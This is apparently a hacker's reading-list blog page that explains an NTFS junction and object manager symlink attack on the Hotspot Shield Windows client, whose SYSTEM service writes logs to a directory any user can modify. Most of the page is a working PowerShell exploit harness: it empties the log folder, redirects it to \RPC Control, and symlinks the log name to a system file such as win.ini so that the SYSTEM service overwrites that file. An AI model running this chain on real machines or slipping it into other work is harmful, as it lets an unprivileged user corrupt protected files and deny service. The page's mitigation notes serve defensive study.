Resources
People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!
James Forshaw showed techniques that abuse NTFS junctions and symbolic links to escalate privileges back in 2015. Since then, this has become an extremely popular method for hacking Windows clients.
The Hotspot Shield client (running as SYSTEM) writes a log file to C:\ProgramData\Hotspot Shield\logs. However, that directory can be modified by any user! So, what does this mean? The log file turns into an arbitrary file write with SYSTEM privileges!
To exploit this, the following must be done:
- Delete all of the files in the logs folder (a directory can only carry a reparse point when it is empty).
- Turn the now-empty logs folder into an NTFS junction (mount point) whose target is the \RPC Control object directory, which any user can create objects in.
- Inside \RPC Control, create an object manager symbolic link whose name is the log file's name and whose target is any destination file; when the service opens its log, it lands on that file.
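The chain above as a PowerShell harness. This is an added example, not code from the original post or from Hotspot Shield: it drives James Forshaw's symboliclink-testing-tools (CreateMountPoint.exe and CreateSymlink.exe), and the tool directory, the log file name and the overwrite target are assumptions, not values from the post. Run it as a normal, non-admin user on a throwaway test VM.

```powershell
# Added example (not from the original post): reproduce the junction + object manager
# symlink chain against a log directory that any user can modify.
# ASSUMED: Forshaw's symboliclink-testing-tools are unpacked under $Tools; check the
# tools' own usage text for argument order before relying on it.
$LogDir  = 'C:\ProgramData\Hotspot Shield\logs'   # path from the write-up
$LogName = 'hsslog.log'                            # ASSUMED: use the name the service really opens
$Target  = 'C:\Windows\win.ini'                    # ASSUMED: any file SYSTEM can write; clobbering it is the DoS
$Tools   = 'C:\Tools\symboliclink-testing-tools'   # ASSUMED: location of the tool binaries

# Pre-condition check: can a low-privileged principal modify the directory?
# (Heuristic: looks at Allow ACEs only; deny ACEs and owner rights are ignored.)
function Test-DirModifiableByUsers {
    param([string]$Path)
    $lowPriv   = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
    $writeBits = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                 [System.Security.AccessControl.FileSystemRights]::Delete -bor
                 [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
                 [System.Security.AccessControl.FileSystemRights]::WriteAttributes
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if (($ace.AccessControlType -eq 'Allow') -and
            ($lowPriv -contains $ace.IdentityReference.Value) -and
            (([int]($ace.FileSystemRights -band $writeBits)) -ne 0)) {
            return $true
        }
    }
    return $false
}

if (-not (Test-DirModifiableByUsers $LogDir)) {
    throw "$LogDir is not modifiable by unprivileged users; the chain does not apply."
}

# Step 1: the directory must be empty before it can become a reparse point.
Get-ChildItem -LiteralPath $LogDir -Force | Remove-Item -Force -Recurse

# Step 2: turn the logs directory into a junction targeting the \RPC Control object
# directory. mklink /J is no use here: it rewrites the target as a \??\C:\... path,
# so the dedicated tool writes the raw reparse data instead.
& "$Tools\CreateMountPoint.exe" $LogDir '\RPC Control'
$attrs = (Get-Item -LiteralPath $LogDir -Force).Attributes
if (([int]($attrs -band [IO.FileAttributes]::ReparsePoint)) -eq 0) {
    throw 'Junction was not created; the directory may not have been empty or writable.'
}

# Step 3: inside \RPC Control create an object manager symlink whose NAME is the log
# file the service opens and whose target is the file to clobber. Object manager
# symlinks live only as long as the creating handle, so CreateSymlink.exe stays
# resident; leave it running until the service has written.
$symlinkProc = Start-Process -FilePath "$Tools\CreateSymlink.exe" `
    -ArgumentList @("`"\RPC Control\$LogName`"", "`"$Target`"") -PassThru

# Step 4: make the service log something (restart the client), then confirm that log
# text landed in the target. Only log lines arrive, which is why this is a DoS /
# file-corruption primitive rather than code execution.
$before   = (Get-Item -LiteralPath $Target).LastWriteTime
$deadline = (Get-Date).AddSeconds(120)
Write-Host "Waiting for the SYSTEM service to write to $Target ..."
while (((Get-Item -LiteralPath $Target).LastWriteTime -eq $before) -and ((Get-Date) -lt $deadline)) {
    Start-Sleep -Seconds 2
}
Get-Content -LiteralPath $Target -TotalCount 5

# Cleanup: drop the symlink (kill the holder) and the junction.
Stop-Process -Id $symlinkProc.Id -Force
Remove-Item -LiteralPath $LogDir -Force
```

Two caveats worth keeping in mind. The chain only works because the service opens the log with its own SYSTEM token and follows reparse points; a service that impersonates the caller, opens the log with FILE_FLAG_OPEN_REPARSE_POINT, or logs to a directory only administrators can write is not affected. And the ACL check is a quick heuristic for triage, not a full effective-permissions calculation: confirm with an actual file create and delete as the low-privileged user before spending time on the rest of the chain.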
However, because these are log files whose content is not trivial to control, this only results in a DoS rather than code execution. Still, a good find and a good explanation of the Windows bug that keeps on giving!